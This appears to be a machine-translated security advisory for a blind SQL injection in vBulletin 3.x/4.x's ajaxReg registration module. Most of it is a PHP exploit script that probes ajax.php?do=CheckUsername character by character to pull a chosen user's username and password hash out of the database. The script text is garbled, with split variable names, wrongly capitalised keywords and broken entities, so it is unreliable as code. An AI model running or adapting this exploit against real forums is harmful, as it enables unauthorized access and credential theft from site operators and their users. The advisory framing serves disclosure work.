VBulletin 3.x/ 4.x ajaxReg module SQL blind Injection Vulnerability

Release date:
Updated on:

Affected Systems:
VBulletin
Description:
--------------------------------------------------------------------------------
Bugtraq id: 56877

VBulletin is a powerful and flexible forum program suite that can be customized based on your needs. AjaxReg is an ajax-type registration module that supports real-time field checks.

VBulletin's ajaxReg module has the SQL injection vulnerability in implementation. After successful exploitation, attackers can access the database without authorization.

<* Source: Cold z3ro
*>

Test method:
--------------------------------------------------------------------------------

Alert

The following procedures (methods) may be offensive and are intended only for security research and teaching. Users are at your own risk!

#! /Usr/bin/php
<?

# VBulletin 3.x/ 4.x AjaxReg remote Blind SQL Injection Exploit
# Https://www.example.com/-4HcW64E57CI/ULWN9mDnK8I/AAAAAAAAABo/cc0UA9eV_ak/s640/11-26-2012%25206-02-5s3%2520AM.png
# Livedemo: http://www.example.com/watch? V = LlKaYyJxH7E
# Check it: http://www.example.com/vBulletin/clientscript/register.js

Function usage ()
{
Echo
"\ N [+] vBulletin 3.x/ 4.x AjaxReg remote Blind SQL Injection Exploit ".
"\ N [+] Author: Cold z3ro ".
& Quot; \ n [+] Site: http://www.example.com | www.example.com & quot ".
"\ N [+] vandor: http://www.example.com/forum/showthread.php? T = 144869 ".
"\ N [+] Usage: php 0day. php "\ N [+] Ex.: php 0day. php www.example.com/vBulletin/1 abcdefghijklmnopqrstuvwxyz ".
"\ N [+] Note.: Its a 0day exploit \ n ";
Exit ();
}

Function check ($ hostname, $ path, $ field, $ pos, $ usid, $ char)
{
$ Char = ord ($ char );
$ Inj = 'ajax. php? Do = CheckUsername & param = ';
$ Inj. =
"Admin '+ and + ascii (substring (SELECT/**/{$ field}/**/from/**/user/**/where/**/userid ={$ usid }), {$ pos}, 1) = {$ char }/*";
$ Culr = $ hostname. $ path. $ inj;
$ Curl = curl_init ();
Curl_setopt ($ curl, CURLOPT_URL, $ culr );
Curl_setopt ($ curl, CURLOPT_HEADER, 1 );
Curl_setopt ($ curl, CURLOPT_VERBOSE, 0 );
Ob_start ();
Curl_exec ($ curl );
Curl_close ($ curl );
$ Con = ob_get_contents ();
Ob_end_clean ();
If (eregi ('invalid', $ con ))
Return true;
Else
Return false;
}

Function brutechar ($ hostname, $ path, $ field, $ usid, $ key)
{
$ Pos = 1;
$ Chr = 0;
While ($ chr <strlen ($ key ))
{
If (check ($ hostname, $ path, $ field, $ pos, $ usid, $ key [$ chr])
{
Echo $ key [$ chr];
$ Chr =-1;
$ Pos ++;
}
$ Chr ++;
}
}

If (count ($ argv )! = 4)
Usage ();

$ Hostname = $ argv [1];
$ Path = $ argv [2];
$ Usid = $ argv [3];
$ Key = $ argv [4];
If (empty ($ key ))
$ Key = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789 ";

Echo "[+] Username :";
Brutechar ($ hostname, $ path, "username", $ usid, $ key );
Echo "\ n [+] Password :";
Brutechar ($ hostname, $ path, "password", $ usid, $ key );
Echo "\ n [+] Done ..";
Echo "\ n [+] It's not fake, its real .";
# Word to 1337day.com, stop scaming me

?>

Suggestion:
--------------------------------------------------------------------------------
Vendor patch:

VBulletin
---------
Currently, the vendor does not provide patches or upgrade programs. We recommend that users who use the software follow the vendor's homepage to obtain the latest version:

Http://www.vbulletin.com/